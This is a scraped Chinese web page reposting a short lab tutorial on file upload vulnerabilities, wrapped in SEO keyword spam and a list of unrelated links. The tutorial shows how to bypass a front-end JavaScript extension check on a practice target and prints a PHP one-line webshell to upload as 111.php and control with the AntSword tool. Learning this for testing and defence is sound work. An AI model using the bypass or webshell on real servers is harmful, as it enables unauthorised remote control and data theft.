当前位置: 首页 > wzjs >正文

做外贸大一点的网站中文搜索引擎大全

做外贸大一点的网站,中文搜索引擎大全,贵州省房屋和城市建设厅官方网站,做淘宝客网站要不要备案1.文件上传漏洞 服务器端脚本语言对上传文件没有严格的验证和过滤,就可以给攻击者上传恶意脚本文件的可能。 文件上传检测绕过: 简单思路:(这里以前端上传图片为例) ①开启phpstudy,启动apache即可&…

1.文件上传漏洞

服务器端脚本语言对上传文件没有严格的验证和过滤,就可以给攻击者上传恶意脚本文件的可能。

文件上传检测绕过:

简单思路:(这里以前端上传图片为例)

①开启phpstudy,启动apache即可,将目录设为靶场网站下www的目录。

②获取靶场源码,可以先保存到本地。

③使用notepad++修改文件上传过滤的JS文件,使其条件判断允许非正常文件后缀通过,并且在form表单中加入action属性,处理前端页面。

下面就是一个文件类型判断的代码,将判断条件可以直接改为1==-1就可以让文件允许上传。

//判断上传文件类型是否允许上传if (allow_ext.indexOf(ext_name + "|") == -1) {var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;alert(errMsg);return false;}

重新打开本地保存好的靶场首页文件,选择任意php文件上传后,复制图片地址进行访问。(使用了一个info.php文件)

如果要上传一句话木马,那么直接写文件

<?php @_eval($_POST['hack']); ?>

将文件名改为111.php,直接上传文件,上传成功后,复制图片地址。使用蚁剑,将刚才的地址和连接密码(也就是POST参数)连接并添加。

上传成功,刚才的两个文件这里都可以看到。

http://www.dtcms.com/wzjs/409772.html

相关文章:

  • 软件开发有哪些类型上海seo推广整站
  • 长治做网站的公司网络营销推广的手段
  • 页面模板怎么修改百度竞价优化软件
  • 动态网站开发试题和答案竞价托管收费标准
  • 免费发布信息网站大全下载安装简述网站建设的一般流程
  • 网站备案号添加超链接男生最喜欢的浏览器
  • 天津网站建设报价如何建立自己的网络销售
  • 软件的开发流程西安网站seo价格
  • 意识形态建设专题网站智慧软文网站
  • 摹客 2023年设计师必备设计工具seo搜索引擎优化实战
  • 网站备案怎么查询网址查询注册信息查询
  • 湛江网站制作多少钱湖南做网站的公司
  • 东莞长安网站公司服务器域名查询
  • 命令行连接wordpress北京seo优化排名推广
  • 要做网站到哪里做自己如何制作一个网站
  • 想做个网站怎么做疫情最新数据消息地图
  • 西安公司排行榜网站关键词搜索排名优化
  • 重庆网站建设行业新闻网络推广运营公司
  • 网页设计与网站开发经济可行性酒店营销策划与运营
  • 网站维护外包合同百度游戏中心app
  • 湖北省住房和建设厅网站首页网站推广引流最快方法
  • 建设局网站项目负责人资质要求达内教育
  • 免费建站网站一级大陆在线看网页开发公司
  • 4网站建设哪里好点seo排名点击软件推荐
  • wordpress站群的作用武汉网站建设公司
  • dz论坛做分类网站刷排名有百度手机刷排名
  • 织梦如何修改网站内容网页设计与制作书籍
  • 优秀购物网站cilimao磁力猫搜索引擎
  • 网页版微信二维码加载失败百度人工优化
  • 北京免费网站建设模板com网站域名注册